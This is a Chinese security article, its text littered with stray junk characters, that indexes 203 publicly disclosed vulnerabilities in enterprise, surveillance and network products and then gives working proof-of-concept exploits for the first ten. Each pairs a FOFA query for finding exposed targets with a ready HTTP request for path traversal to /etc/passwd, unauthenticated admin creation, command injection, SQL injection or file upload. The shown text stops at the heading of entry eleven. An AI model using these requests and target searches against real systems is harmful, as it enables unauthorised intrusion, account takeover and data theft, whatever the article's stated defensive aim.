互联网公开漏洞整理202309-2024068 V) N% S' C Z7 {% K
道一安全 2024-06-05 07:41 北京) x# j6 G. o' \2 p% ^1 i- m
以下文章来源于网络安全新视界 ,作者网络安全新视界
( f* W% A/ F, }+ {
5 N' s2 H+ n& z. t( i! h发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
1 p" R8 q- Z' | m
$ Y2 C6 F, e. p漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
& g1 N$ `5 ~5 g6 s# q3 Q, T! n
% R- ]0 x, n V/ m! }安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。. ]- g c2 j( h6 b( s, V+ T6 |* ?1 ~
& m. j; _! W. y& v! x$ b; F! T
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
4 ^! p& q, D9 u
$ ^& L+ o' A4 r7 d7 l- d: Z9 E合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
/ z2 H Z# s+ _9 X( {2 L+ a
2 e. z5 H( N+ ~* u+ n: \. I+ }$ Q. Z8 @% K" W, s, _
声明/ r& x3 Q9 n' u5 U1 @ T2 g
' u8 `! Z7 q' B, A% f3 o为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。# d. Z5 U7 `( l7 \. n# ]' }
4 \5 q( F6 M5 W# V* u0 r3 m( u有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
, N: y' O7 ]& I. i: p& O! e, J
: q; u6 l3 D) e" I, J, N2 t8 R" ^
7 d3 ?% p$ b5 M8 O% p" v% s. F! F* y
目录; _5 d. ` D5 Z5 q
/ n# w& w2 w- Q2 E6 P01. A1 z4 f' S, m f4 ?2 e7 c
, E0 m2 K6 x' q5 |# u6 y) n4 Q+ v, g. g
1. StarRocks MPP数据库未授权访问
- ]6 K& y# ~7 P" x2. Casdoor系统static任意文件读取7 G& w. D% m" c9 i$ m3 H7 _) D! W
3. EasyCVR智能边缘网关 userlist 信息泄漏
" V0 u/ [# e/ \, m, a7 M1 y: o4. EasyCVR视频管理平台存在任意用户添加
3 X0 c7 A& r& A( H! `5. NUUO NVR 视频存储管理设备远程命令执行& f9 N% t O- x% l! e) }
6. 深信服 NGAF 任意文件读取6 M, Z! p `8 U+ `9 v* k4 w
7. 鸿运主动安全监控云平台任意文件下载% ^7 m" J6 X3 N0 c* {0 g* v; R
8. 斐讯 Phicomm 路由器RCE* S; M) a. ` k y
9. 稻壳CMS keyword 未授权SQL注入2 A+ y/ Y8 P% Q$ l1 ~
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传+ Q2 U9 C2 O5 A" P( s
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
* V) B/ C3 S6 W4 p7 V12. Jorani < 1.0.2 远程命令执行
' {, x- B! t2 \( o# j& U& _13. 红帆iOffice ioFileDown任意文件读取
' l; v7 z2 f% C# k4 f6 A! j14. 华夏ERP(jshERP)敏感信息泄露
. I! r8 ^* a. h& K15. 华夏ERP getAllList信息泄露
+ o* A5 D6 f0 k* d0 q" i% X16. 红帆HFOffice医微云SQL注入
3 W5 [# g) {" ?2 P3 m2 e2 ?17. 大华 DSS itcBulletin SQL 注入" a6 p4 A2 f7 V7 h5 L& z% S
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露" U) d r* {( x# |% \6 a0 e
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入7 N1 A% B( E) y# U: F5 ?
20. 大华ICC智能物联综合管理平台任意文件读取
& S9 l: y: ~% w. {9 b+ @. z! V21. 大华ICC智能物联综合管理平台random远程代码执行9 U6 {6 N0 H; ?+ r4 X
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
2 w/ {6 R+ v5 C23. 大华ICC智能物联综合管理平台 fastjson远程代码执行1 }( S* d6 E& \ `! u, x4 N
24. 用友NC 6.5 accept.jsp任意文件上传
% [ ~8 _ h, r+ @$ i25. 用友NC registerServlet JNDI 远程代码执行
! g( `4 V9 t* N: J26. 用友NC linkVoucher SQL注入- Z* J2 n! C, }+ F* z3 J. v
27. 用友 NC showcontent SQL注入
K9 ?& [3 r; C, [# b28. 用友NC grouptemplet 任意文件上传
5 W! e( d, }6 N; Z. i7 m29. 用友NC down/bill SQL注入3 s- {' `2 ~/ h/ w7 @' o
30. 用友NC importPml SQL注入8 c2 U2 c% J' K# [9 x: ]0 ~8 F
31. 用友NC runStateServlet SQL注入) x, j3 m1 n( _+ M5 J# X' Y
32. 用友NC complainbilldetail SQL注入+ w! j. P9 g8 I9 j$ `/ `( U
33. 用友NC downTax/download SQL注入& l. ^: m4 v% `
34. 用友NC warningDetailInfo接口SQL注入
z$ m- Y9 \0 y6 R1 Q% U35. 用友NC-Cloud importhttpscer任意文件上传
3 n. }9 D( R: \* N& t+ v3 D36. 用友NC-Cloud soapFormat XXE
+ ]# h1 x2 H K) Y37. 用友NC-Cloud IUpdateService XXE, n1 h3 C& W. D' v4 n
38. 用友U8 Cloud smartweb2.RPC.d XXE3 y* i1 ~" t0 G( J
39. 用友U8 Cloud RegisterServlet SQL注入5 Y& T& [# t1 A0 n" c0 U
40. 用友U8-Cloud XChangeServlet XXE# b9 R; j" o. r" G
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入6 q$ `6 h5 J: ?1 o+ j
42. 用友GRP-U8 SmartUpload01 文件上传
4 q2 y* m! `& i43. 用友GRP-U8 userInfoWeb SQL注入致RCE& \& D7 [5 ?) z% c% V+ j
44. 用友GRP-U8 bx_dj_check.jsp SQL注入, }3 x# x: C( n
45. 用友GRP-U8 ufgovbank XXE
9 M. x! H C6 U. c. ^" u7 p7 b46. 用友GRP-U8 sqcxIndex.jsp SQL注入$ r3 c/ P$ \" ~- B2 s& |
47. 用友GRP A++Cloud 政府财务云 任意文件读取
& M! R4 Y- }0 l- v48. 用友U8 CRM swfupload 任意文件上传+ x6 e7 C( |0 m
49. 用友U8 CRM系统uploadfile.php接口任意文件上传. e: n# U& h; d* ?! u& d% s U
50. QDocs Smart School 6.4.1 filterRecords SQL注入
" A, f- D5 V" i4 D: x9 H51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
& a, C u9 y8 y6 ^52. 泛微E-Office json_common.php sql注入/ x' N& @, ?) A9 ]7 v' m$ n) V
53. 迪普 DPTech VPN Service 任意文件上传
$ W9 p8 E& W( ]( j9 ?! n8 w* G54. 畅捷通T+ getstorewarehousebystore 远程代码执行! o9 D2 c, `0 f/ E8 G7 d, Q8 q
55. 畅捷通T+ getdecallusers信息泄露) }! p' e+ a7 S; E
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE% w/ K# _3 |! X" f; R- R4 K
57. 畅捷通T+ keyEdit.aspx SQL注入
% r( _2 B# |8 r2 E58. 畅捷通T+ KeyInfoList.aspx sql注入( ^- A/ I8 M' @1 s- L2 k* [& {! f. Y
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
4 g; k5 y3 r, w7 k/ m60. 百卓Smart管理平台 importexport.php SQL注入
* P9 m4 p. |3 l" P/ {61. 浙大恩特客户资源管理系统 fileupload 任意文件上传8 Q( ?4 L% ~) @) Z2 \0 z
62. IP-guard WebServer 远程命令执行: G H+ V6 ~0 E1 W6 _+ _# |5 `$ w
63. IP-guard WebServer任意文件读取
z* S7 P( I a" f64. 捷诚管理信息系统CWSFinanceCommon SQL注入
2 U% L: u; e. p. ^65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
' ^, m% R* g/ N' F+ j- r, r66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入1 W# u6 Y) G8 u; K; K
67. 万户ezOFFICE wpsservlet任意文件上传
- y/ G+ m4 w: v1 L" T4 i2 \68. 万户ezOFFICE wf_printnum.jsp SQL注入
- _1 b. z' Z( l5 a. w. n# [( n69. 万户 ezOFFICE contract_gd.jsp SQL注入1 y0 I( B) t) p3 v, y# u& c# y
70. 万户ezEIP success 命令执行
7 W# Q& \+ ]+ s Z71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
% m( l, C6 B1 Y3 ^4 h1 f72. 致远OA getAjaxDataServlet XXE) P$ C; I, u5 r- w R
73. GeoServer wms远程代码执行
$ v% X, N8 `4 t! N- K: @# w" Q' {" t) k74. 致远M3-server 6_1sp1 反序列化RCE; K9 L; D; V6 [& Z; v% m2 L( a, V
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE8 f; w. B: m% l) o2 Y9 _
76. 新开普掌上校园服务管理平台service.action远程命令执行) n; m# m8 Y; P0 Z' X: y
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
$ J. k- j5 B5 s0 u8 i; c- P4 \4 L/ @7 x78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传- e" i& m/ D) O Y9 M5 d7 j% K4 V
79. BYTEVALUE 百为流控路由器远程命令执行
" n/ S; s9 L' }$ X80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传: A z+ \" U C0 E9 q
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
D. }9 Q4 Z2 g# s82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
) I( Q; u9 h* y+ u* o' ]0 G5 N83. JeecgBoot testConnection 远程命令执行
2 `7 Y' v* ~7 f+ k. y+ u84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
* W) D+ C1 h4 }3 o85. SysAid On-premise< 23.3.36远程代码执行4 ~2 M6 n) C. q( i3 I( C
86. 日本tosei自助洗衣机RCE& b( v) T: F5 H2 u0 V0 D" s/ O! a
87. 安恒明御安全网关aaa_local_web_preview文件上传1 j9 A- v! ^/ I. e
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
& w1 Z& ~/ a( m# D89. 致远互联FE协作办公平台editflow_manager存在sql注入
' ?7 S! i0 Y$ n1 S- P/ K90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行) f/ X# t& ]* Z: ]6 I n
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取5 N0 R9 H% k0 D6 J" K
92. 海康威视运行管理中心session命令执行/ }0 i! q5 Y' {* M& @8 H
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传2 ?3 L; k! g+ `
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传" u2 C8 ^% C) r: z/ G+ k
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
# g6 h, b) m6 k) T96. Apache OFBiz 18.12.11 groovy 远程代码执行+ O5 D& o2 d0 s2 Y# a, }
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行 @1 Y( x5 b5 L9 i$ R( d6 W9 d/ _
98. SpiderFlow爬虫平台远程命令执行
* E' y* ~5 I8 z99. Ncast盈可视高清智能录播系统busiFacade RCE
2 [1 B; [" N( l100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
, _8 C$ k# k& g5 d% q* P/ E101. ivanti policy secure-22.6命令注入2 n8 P B' }8 }6 j! W
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行; ~) y5 M7 [2 V. j' h# m( t
103. Ivanti Pulse Connect Secure VPN XXE: x6 z0 }% h) C% ^
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露. A5 d; Q f5 ]
105. SpringBlade v3.2.0 export-user SQL 注入
" F) `7 ]+ B2 _+ Q3 U1 s106. SpringBlade dict-biz/list SQL 注入
: ?* j( {9 s& J% Z' N) X107. SpringBlade tenant/list SQL 注入 p; R) i. \7 k+ q( Y' Z' K
108. D-Tale 3.9.0 SSRF! ^) I8 j+ E! g1 N
109. Jenkins CLI 任意文件读取: l0 G' j+ B" \. D0 O( N
110. Goanywhere MFT 未授权创建管理员
5 e5 j8 _2 q7 O# X111. WordPress Plugin HTML5 Video Player SQL注入
! l* N5 V$ ^) Q' H0 J0 t112. WordPress Plugin NotificationX SQL 注入
) v' o! l# h( |6 N0 Y, `' j) w113. WordPress Automatic 插件任意文件下载和SSRF
$ \2 `+ z2 x8 a) B1 k114. WordPress MasterStudy LMS插件 SQL注入 p0 l3 }+ i/ L4 F5 j8 \' Q
115. WordPress Bricks Builder <= 1.9.6 RCE: E2 P. ]' v4 H3 M- K$ [0 V
116. wordpress js-support-ticket文件上传; y4 M0 q- e5 n- F, I- Z% b
117. WordPress LayerSlider插件SQL注入
! I% v- X9 o, [; u2 k118. 北京百绰智能S210管理平台uploadfile.php任意文件上传1 I: n9 _1 r& Q
119. 北京百绰智能S20后台sysmanageajax.php sql注入
. D [6 S" w: T120. 北京百绰智能S40管理平台导入web.php任意文件上传* J9 ^& R- s( M( L, g" D" h
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
# R5 r- i& {3 K! _9 \, Z9 x8 I122. 北京百绰智能s200管理平台/importexport.php sql注入* {1 |# {; w2 u, ~' {
123. Atlassian Confluence 模板注入代码执行- }3 F( v/ {% a; C7 R- D8 \. d5 V
124. 湖南建研工程质量检测系统任意文件上传
" m1 F7 R& d0 B( [% U6 Z125. ConnectWise ScreenConnect身份验证绕过
; s8 j2 i* F" b& e+ J( m1 ]1 |126. Aiohttp 路径遍历
* l6 s- x+ c4 l0 U( [127. 广联达Linkworks DataExchange.ashx XXE, B0 d- W0 W" Y5 I! k+ p' s
128. Adobe ColdFusion 反序列化
8 ~$ u4 W. G+ P# Y" j129. Adobe ColdFusion 任意文件读取
; g% s/ l9 z: Z& z9 K3 {" R- H130. Laykefu客服系统任意文件上传 {8 q, A3 E. g' T9 \8 i
131. Mini-Tmall <=20231017 SQL注入
$ S2 m2 [& Z4 X: y0 E5 o132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
5 K3 {, j/ K( K+ X, F) T6 z, ~133. H5 云商城 file.php 文件上传% s$ S A# F: n+ `: `
134. 网康NS-ASG应用安全网关index.php sql注入
/ v+ t* k, x, Y) R9 p9 q' d2 b135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
2 l$ k, O4 i$ X( G# @, s" _# M136. NextChat cors SSRF' ]3 ~( l: |5 |2 ^" o' F
137. 福建科立迅通信指挥调度平台down_file.php sql注入
/ d2 ^% F. B) Z9 ]138. 福建科立讯通信指挥调度平台pwd_update.php sql注入" w1 e- u$ X0 a
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
2 P% a2 Z$ {3 V- V140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
2 H( T+ c% x o+ r; _& _1 d+ }6 W141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
9 [4 V+ B: l3 V* x% I M142. CMSV6车辆监控平台系统中存在弱密码: O$ u! S' u. ?, A% A
143. Netis WF2780 v2.1.40144 远程命令执行/ E7 Y+ G/ @3 l7 d3 l/ ]! Q
144. D-Link nas_sharing.cgi 命令注入
# t, y' P" l6 A0 w145. Palo Alto Networks PAN-OS GlobalProtect 命令注入) M4 g. p o7 ~4 N9 @
146. MajorDoMo thumb.php 未授权远程代码执行0 T( r5 W% v/ J; A( g: D* h3 j
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
: x" T. L8 F) B) q5 e8 Q; m# w" B- x148. CrushFTP 认证绕过模板注入/ s; P; i" |( u7 S! q
149. AJ-Report开源数据大屏存在远程命令执行
- K5 ~' M4 ?7 i8 W/ N, ~4 M( l; K150. AJ-Report 1.4.0 认证绕过与远程代码执行- L! X8 p# J" }: F/ C
151. AJ-Report 1.4.1 pageList sql注入
4 A$ f+ Q. Q I; F6 k& m( ^152. Progress Kemp LoadMaster 远程命令执行
6 M0 Q0 K3 @$ \153. gradio任意文件读取
. ]1 I }* ~6 X3 Q' |' h154. 天维尔消防救援作战调度平台 SQL注入5 ]' A B4 P W8 S9 V; M' l3 P
155. 六零导航页 file.php 任意文件上传" P0 @, i4 k* _# c7 |1 m/ [
156. TBK DVR-4104/DVR-4216 操作系统命令注入3 k1 E/ l! c- h! g0 e
157. 美特CRM upload.jsp 任意文件上传
2 M u$ I1 y- a7 S158. Mura-CMS-processAsyncObject存在SQL注入
2 N' ^4 A2 r; O8 u d, [1 X$ _159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
, A+ u4 l: v/ o# p: g& {160. Sonatype Nexus Repository 3目录遍历与文件读取
% N- }1 E9 \$ H( ]) H161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
# I# _4 { f) m, Y, h162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传3 n4 g( f; G E- C
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
; o% Z6 c: s. m4 ?7 g# j164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传# G1 m% T0 b& v* C Y% ?
165. OrangeHRM 3.3.3 SQL 注入
1 j) M2 r/ v1 ~ V, k: e9 S8 T" J166. 中成科信票务管理平台SeatMapHandler SQL注入" M7 y/ W0 V: x- ^$ e/ g
167. 精益价值管理系统 DownLoad.aspx任意文件读取, O; q2 g# z+ q
168. 宏景EHR OutputCode 任意文件读取
' i$ M3 y) @9 Q' [! `169. 宏景EHR downlawbase SQL注入
9 H* c5 g% ^& S* ~170. 宏景EHR DisplayExcelCustomReport 任意文件读取/ x5 d& q2 l; I; s& b1 @# E- x
171. 通天星CMSV6车载定位监控平台 SQL注入' Z% w) a5 D! e
172. DT-高清车牌识别摄像机任意文件读取
: ]6 Y0 R7 w+ Q/ U. A, e173. Check Point 安全网关任意文件读取
- V% u, p d: p174. 金和OA C6 FileDownLoad.aspx 任意文件读取/ X' S( \5 j2 k2 F
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
: n, u1 w" E6 Z) a: L) }8 D176. 电信网关配置管理系统 rewrite.php 文件上传
2 x& s8 d, y, f6 O2 p. E177. H3C路由器敏感信息泄露/ S. N- C' D V1 g) ~
178. H3C校园网自助服务系统-flexfileupload-任意文件上传( p4 z9 p* |% ~" |6 ?: i/ ~
179. 建文工程管理系统存在任意文件读取9 [$ l/ C, e f# a1 P: h9 P. R" J
180. 帮管客 CRM jiliyu SQL注入0 o8 w: G3 `4 d0 g" s: g }, C) G
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
# C3 `' d6 ~" n, T0 j6 \182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
0 r1 n) ~* ? Z0 O183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
& T. A) F" A. A6 |" S184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加1 u) Z- x0 [ ]4 ~
185. 瑞友天翼应用虚拟化系统SQL注入( F# m: b& j8 q$ M
186. F-logic DataCube3 SQL注入
" e9 \ ] D% X187. Mura CMS processAsyncObject SQL注入
7 T. Q" @4 @4 ^6 L) c$ o188. 叁体-佳会视频会议 attachment 任意文件读取
- b) {* y7 ]- j2 A$ r189. 蓝网科技临床浏览系统 deleteStudy SQL注入
! g& p' R0 `9 H5 B9 O190. 短视频矩阵营销系统 poihuoqu 任意文件读取) L, r+ x2 Q+ p% i( d; l9 x5 g9 s
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
4 {" M0 e! |" e: D3 t192. 富通天下外贸ERP UploadEmailAttr 任意文件上传. d5 J) d, Y+ G" l' }
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
# e' I- c% O, ] x) N194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
6 H+ Q2 v3 G# w$ ~; {195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
% \! h2 [; v& a8 m2 u, Z196. 河南省风速科技统一认证平台密码重置- X, U3 ^/ F. |
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
# H6 A$ j6 v( V) Y198. 阿里云盘 WebDAV 命令注入4 Z- H2 P( P$ L; N
199. cockpit系统assetsmanager_upload接口 文件上传5 E' U1 i$ U1 L& O: P% d+ m; E
200. SeaCMS海洋影视管理系统dmku SQL注入
, c+ W; i2 @5 T3 h n201. 方正全媒体新闻采编系统 binary SQL注入
; K9 W1 e" y0 z4 _202. 微擎系统 AccountEdit任意文件上传& I3 O7 ~5 r* U$ U v1 H+ `
203. 红海云EHR PtFjk 文件上传
' t( ]3 ^& p) {6 o% e4 O: F
6 V; h- B E3 j7 H) ?9 HPOC列表9 u# T4 H% _& V. D5 {1 @$ z0 W
2 [' j2 l6 F5 N2 e+ R028 g: t) a. ^- b: ]( O* Q: [
% w- x5 W% a" Z% [* s# F1. StarRocks MPP数据库未授权访问
! g9 F7 |/ I0 G7 @* ~FOFA :title="StarRocks"( u8 V4 R, _& j/ L+ B
GET /mem_tracker HTTP/1.19 q& i2 D2 M% p# i% S6 H9 c
Host: URL C2 W4 N- P h. ^& O
0 C" k% B( A h0 [& A0 A* F2 Y& H6 T5 }5 ?* K' y: P% g! x
2. Casdoor系统static任意文件读取
' g4 c+ S* ] y" b! W% C( QFOFA :title="Casdoor"
" b B3 t8 l: Q: D; J# r. V; c* B- DGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
3 d+ @+ w) A0 @8 DHost: xx.xx.xx.xx:99996 _7 L1 w) u+ T
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: S; [, d& X/ K3 A2 t+ JConnection: close
$ Q9 Z6 a* ~) J, U& S# K2 oAccept: */*
8 P7 G' {' s, @5 cAccept-Language: en( D8 m0 [& C2 u$ N% }
Accept-Encoding: gzip1 E" y3 P& l$ H
7 t3 ?) ?1 b/ R. y/ d- y9 V
6 z5 N5 N# U$ z+ ~, C3. EasyCVR智能边缘网关 userlist 信息泄漏 _ D) B% B+ D, Q0 D
FOFA :title="EasyCVR"
. P) u- \0 f$ d5 f3 ^: rGET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
4 U& z" B* X6 z3 P/ E. K( LHost: xx.xx.xx.xx! C# S( K7 J- O
3 ?# c, d2 L8 S1 x, i2 b2 T" |
4 V& s X) E! J# ^1 G7 C! C4. EasyCVR视频管理平台存在任意用户添加4 L! e; r3 s+ U" F1 w
FOFA :title="EasyCVR"
/ w' {4 N0 Q+ J& k5 J8 |1 }! A1 L
- V( S2 S4 g- } i/ x% g. \/ |0 g, tpassword更改为自己的密码md5
4 i/ O+ H2 X$ H2 j" @POST /api/v1/adduser HTTP/1.1 O' n- c$ R1 N: f/ j8 T; R6 L
Host: your-ip
K) T% _3 i5 N" u8 a9 @4 FContent-Type: application/x-www-form-urlencoded; charset=UTF-8
8 L) l* R+ t! [# p$ v. w
I* [+ c1 T# T; w& \$ j: @name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1! ^1 C4 G& D Q" e6 J; s
" x2 v/ W7 m& s) W0 J( _# W9 `8 y: H; j
5. NUUO NVR 视频存储管理设备远程命令执行/ g5 w: g- q, T1 C7 @( w1 o R
FOFA:title="Network Video Recorder Login"
2 {% B8 t$ {7 N1 Q% S8 {% \! nGET /__debugging_center_utils___.php?log=;whoami HTTP/1.1) P+ D* E; Z' s
Host: xx.xx.xx.xx
: k" D2 \( @9 p8 v0 w& H* |
8 }' g' P& q& x) V
7 x Y% w3 Q: a; _7 I# S5 h! p, a6. 深信服 NGAF 任意文件读取4 A |% O7 S' g, {
FOFA:title="SANGFOR | NGAF"
6 h0 M/ I% ]9 ^8 AGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
8 Y% ~) t# z) e! @9 h5 q& DHost:
% ~! a( {, ~7 c- J% r/ p3 f! `( K( I' r% ? J9 j
( f0 c# V+ ?) H" U. @, M3 r3 _
7. 鸿运主动安全监控云平台任意文件下载% q+ B' _* H' ]" U2 [
FOFA:body="./open/webApi.html"$ i' C2 f- \) C9 C' j1 p/ ~ ?# |
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
9 S( c0 H+ m0 A8 mHost:
/ V) B+ f+ S3 u* [" W
3 }0 T* @. A6 N2 F/ `2 p" O
! {2 N( q, z( p4 t8. 斐讯 Phicomm 路由器RCE6 }$ L X. ^8 j" I6 e" n
FOFA:icon_hash="-1344736688"
- d) a, ^3 X7 L% L/ y+ I默认账号admin登录后台后,执行操作1 L( T1 b% V( ?7 Q" }) p M! j* M
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
9 f8 ~. p+ W0 M! T" F; E8 i- UHost: x.x.x.x* E. b( l8 P: ?. k
Cookie: sysauth=第一步登录获取的cookie
4 O) S) h: t6 H; ~0 n: a+ f! qContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz; [1 b( j8 _. m1 c/ b+ ^5 y% p
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
) k1 t) g& c0 a( ^' @' C9 _
: A7 ?0 q$ \7 z: h3 q------WebKitFormBoundaryxbgjoytz
( v( r4 c/ k% m) p2 s" {/ EContent-Disposition: form-data; name="wifiRebootEnablestatus"' v! U. d" b, `/ i; y
% c0 q1 `; O$ Z& c/ F) ?%s& L$ U3 F7 d$ w3 c0 Z
------WebKitFormBoundaryxbgjoytz+ ~* T; h3 k0 z! g; ?
Content-Disposition: form-data; name="wifiRebootrange"+ J& D. f+ y z3 x. K7 H- n
" U" x& k L) m) t: a! s12:00; id;
+ t B! }* W1 C& B- Z3 f------WebKitFormBoundaryxbgjoytz
8 U1 x' ^7 z7 l7 r% L/ L: {: wContent-Disposition: form-data; name="wifiRebootendrange"
& M _' C. W2 h }
% v% \8 Y* H$ K) [7 ?, X( Q%s:
6 R' n: v, [( I" [------WebKitFormBoundaryxbgjoytz* t" M4 D2 x" N- B0 v/ z
Content-Disposition: form-data; name="cururl2"
7 L3 u, c, G% m: I6 H; @4 z
: H8 [) N$ a7 G- @ ?/ T* ~" \* q1 O7 ~
------WebKitFormBoundaryxbgjoytz--
& u5 I. M5 ~* ^3 l+ y# N2 b. z& b0 y
R% a4 z5 b' B7 w. D) e7 T9. 稻壳CMS keyword 未授权SQL注入$ A2 n! C8 W& C/ P7 y+ d/ J8 y5 b$ ~
FOFA:app="Doccms"- h+ h* N- c& z* X) @
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
6 p3 h5 a+ |: `/ v: w$ ZHost: x.x.x.x
: P% x! H5 G3 H2 F0 s, P+ _: k4 n+ P3 A* U
8 T" B7 d9 i, {$ X
payload为下列语句的二次Url编码$ F! q" F. D2 u: I* i/ [6 w% i
. j) N& L4 D" e' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
) Z" J% s6 }6 A; g$ M" D5 ]+ W
7 d6 }; ~$ ~$ w2 u0 _10. 蓝凌EIS智慧协同平台api.aspx任意文件上传# U, f2 ~! d/ g; [9 M9 a
FOFA:icon_hash="953405444". N; o, w1 J b9 Q" L d
2 w- @% h! w- u: ?% Q
文件上传后响应中包含上传文件的路径9 X8 V* u9 h. ~, L& P
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
; @) m1 ?; W* l# `# N% U4 S, DHost: x.x.x.x:xx6 b* X, U7 p5 K9 r$ {- c/ t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
6 Q1 Y/ b, D# W3 @) O1 \Content-Length: 197, g3 U6 [; J* T! K( G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
/ Z* T) S: _( I! H, PAccept-Encoding: gzip, deflate
7 @! ^9 e: b6 G9 ?Accept-Language: zh-CN,zh;q=0.9
* D* I3 f6 W- M: eConnection: close
9 p# F \- A8 c7 e; Q$ N, I5 YContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu' K0 J$ \8 E6 o/ E4 C7 W3 u
/ ~: \+ _" G8 Y% F2 t1 ^------WebKitFormBoundaryxdgaqmqu
. e3 n% t q$ G- j1 pContent-Disposition: form-data; name="file"filename="icfitnya.txt"
O$ m8 N. O2 J' F) h: i' ?Content-Type: text/html) }9 B+ ~) ~+ U5 O1 }# B
* i2 D8 R) n% n9 m6 V. m( Vjmnqjfdsupxgfidopeixbgsxbf5 N, T( o7 J6 l' v2 R7 R* i
------WebKitFormBoundaryxdgaqmqu--
: Z/ W/ k( q& ]8 n+ N* U2 ~. {3 b: B2 D1 K
: U- @( Y6 p) a' w+ S/ S* I11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
